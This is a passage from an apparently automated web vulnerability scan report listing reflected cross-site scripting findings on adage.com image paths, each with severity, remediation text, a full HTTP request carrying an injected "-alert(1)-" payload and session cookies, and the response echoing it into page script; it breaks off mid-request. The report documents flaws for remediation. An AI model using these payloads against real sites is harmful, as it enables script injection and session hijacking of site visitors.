...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1311609254";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom19038"-alert(1)-"34eeeccf4f1/menus/housing.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";

...[SNIP]...

1.112. http://adage.com/images/bottom/menus/housing.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/housing.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a93ec"-alert(1)-"3555ffd6f45 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menusa93ec"-alert(1)-"3555ffd6f45/housing.png?1311609254 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=04215C28C6DCEF52769DA9E5721B1A40ACAFA138; path=/
Set-Cookie: HMAC=68AF018927246FDB3DB53EDA95DB75075BFDA78F; path=/
Set-Cookie: HMAC=1344219F9EE6B907EBA15C6CF83F8A833776D706; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1311609254";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menusa93ec"-alert(1)-"3555ffd6f45/housing.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.df
...[SNIP]...

1.113. http://adage.com/images/bottom/menus/housing.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/housing.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e57db"-alert(1)-"c134cc6d981 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/housing.pnge57db"-alert(1)-"c134cc6d981?1311609254 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=721CDA73F1E04CA77FB1CA614E7066395F97B2FC; path=/
Set-Cookie: HMAC=28C3D9045FB95E1F1BBB0D409BE76F5D2F8883D6; path=/
Set-Cookie: HMAC=98907B2894AEDC5F4E8E9F10041041571EDB12EC; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1311609254";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/housing.pnge57db"-alert(1)-"c134cc6d981"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.114. http://adage.com/images/bottom/menus/mediaworks.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/mediaworks.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad090"-alert(1)-"48344422a62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesad090"-alert(1)-"48344422a62/bottom/menus/mediaworks.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8A2CD49BEECCB6F4395B0984108D98BED72C52B0; path=/
Set-Cookie: HMAC=0E5C7F865ED0C2BBFDAF17ED9F19C9D14B4D3162; path=/
Set-Cookie: HMAC=C0B0D6112C07C7489ED43F973981D341D498B225; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49470
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/imagesad090"-alert(1)-"48344422a62/bottom/menus/mediaworks.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.
...[SNIP]...

1.115. http://adage.com/images/bottom/menus/mediaworks.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/mediaworks.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7ad5"-alert(1)-"ee21b03fa02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottoma7ad5"-alert(1)-"ee21b03fa02/menus/mediaworks.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=B258FE9A00B70653836F6B2F87AABA7D56BB0F67; path=/
Set-Cookie: HMAC=08BD8A28870AA9E7267CA0D31DE979CD9E74B7F8; path=/
Set-Cookie: HMAC=EEAE3011D649C487E3C6A160938DE4DDF2CE7A18; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49470
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottoma7ad5"-alert(1)-"ee21b03fa02/menus/mediaworks.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js
...[SNIP]...

1.116. http://adage.com/images/bottom/menus/mediaworks.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/mediaworks.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab5f6"-alert(1)-"516e97c6620 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menusab5f6"-alert(1)-"516e97c6620/mediaworks.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=65012706DC3DB7B09CB4D023C190B8A633A58791; path=/
Set-Cookie: HMAC=66CD5A6ECE3872B4E665C001FDEE3D4020CCA91E; path=/
Set-Cookie: HMAC=E82F1C7007E4F66D02829EBFEB661B860D2FC484; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49470
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menusab5f6"-alert(1)-"516e97c6620/mediaworks.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx
...[SNIP]...

1.117. http://adage.com/images/bottom/menus/mediaworks.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/mediaworks.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2163d"-alert(1)-"47f41d3c23a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/mediaworks.png2163d"-alert(1)-"47f41d3c23a?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=B3563C43C39309C2676C5BF30D68D02A57E375B3; path=/
Set-Cookie: HMAC=6E1B88897C4A3D8B78455C3E3EFF340E740E648F; path=/
Set-Cookie: HMAC=C31CE88E61DD09C9A399BBAAFE90929CB7266E14; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49470
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/mediaworks.png2163d"-alert(1)-"47f41d3c23a"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.118. http://adage.com/images/bottom/menus/small_agency_awards.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/small_agency_awards.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4392"-alert(1)-"ecfac324a76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagese4392"-alert(1)-"ecfac324a76/bottom/menus/small_agency_awards.png?1313010494 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=BE03A6B74614EEE91B57370DF86E456EF87FA002; path=/
Set-Cookie: HMAC=93812CD93C72617D54648B8BE15180D8253E1F89; path=/
Set-Cookie: HMAC=6ED1F9FE764221C343383EA8D8383CE1F46568F5; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49479
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313010494";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/imagese4392"-alert(1)-"ecfac324a76/bottom/menus/small_agency_awards.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hb
...[SNIP]...

1.119. http://adage.com/images/bottom/menus/small_agency_awards.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/small_agency_awards.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5525"-alert(1)-"4c9c6b245a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottomd5525"-alert(1)-"4c9c6b245a8/menus/small_agency_awards.png?1313010494 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=7E4AA4A5A0979288D2128A5FBF5B692AFC71DCF8; path=/
Set-Cookie: HMAC=A7484D77740DD5D463B1EB953187B8C63F12B2A9; path=/
Set-Cookie: HMAC=4026680D05BD9E4E082200B691667C9D1255B03B; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49479
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313010494";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottomd5525"-alert(1)-"4c9c6b245a8/menus/small_agency_awards.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="
...[SNIP]...

1.120. http://adage.com/images/bottom/menus/small_agency_awards.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/small_agency_awards.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b1be"-alert(1)-"38f00f74b60 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus4b1be"-alert(1)-"38f00f74b60/small_agency_awards.png?1313010494 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=74A2DEA4FD980FE4E6E6B4A32F4856F9EBAF090F; path=/
Set-Cookie: HMAC=5BA1F15AFC20B505359A22B97DB83834D43F3890; path=/
Set-Cookie: HMAC=1396BEE6EDC26F1B0A22A508E4770099343DED8F; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49479
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313010494";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus4b1be"-alert(1)-"38f00f74b60/small_agency_awards.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,
...[SNIP]...

1.121. http://adage.com/images/bottom/menus/small_agency_awards.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/small_agency_awards.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f518"-alert(1)-"5e391f5e27c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/small_agency_awards.png2f518"-alert(1)-"5e391f5e27c?1313010494 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=4C6507D825F06396B2590E715A1A37EE07B7E29D; path=/
Set-Cookie: HMAC=984023656C4B289CB6E43E90518148B6C5764105; path=/
Set-Cookie: HMAC=261F823D365160C1568D60A04F335BF235D41401; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49479
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
x.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313010494";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/small_agency_awards.png2f518"-alert(1)-"5e391f5e27c"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.122. http://adage.com/images/covers/current_thumb.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/covers/current_thumb.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e8db"-alert(1)-"34400a44cf3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images5e8db"-alert(1)-"34400a44cf3/covers/current_thumb.jpg?1313959833 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
